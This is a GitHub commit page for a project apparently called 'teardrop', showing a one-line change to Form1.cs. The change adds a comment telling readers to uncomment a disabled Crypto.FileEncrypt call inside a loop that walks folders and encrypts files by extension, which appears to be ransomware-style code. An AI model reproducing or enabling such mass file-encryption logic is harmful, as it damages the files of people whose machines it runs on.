Skip to content

Commit

Permalink
Update Form1.cs
Browse files Browse the repository at this point in the history
  • Loading branch information
hackthedev committed Apr 25, 2021
1 parent 2c3e254 commit f9619e1
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions teardrop/teardrop/Form1.cs
Original file line number Diff line number Diff line change
Expand Up @@ -131,6 +131,7 @@ private void ShowAllFoldersUnder(string path, int indent)

if (validExtensions.Contains(ext) && !skipPath.Contains(s))
{
// Uncomment Line below to encrypt files
//Crypto.FileEncrypt(s, Properties.Settings.Default.key);
write("Encrypted " + s);
}
Expand Down

0 comments on commit f9619e1

Please sign in to comment.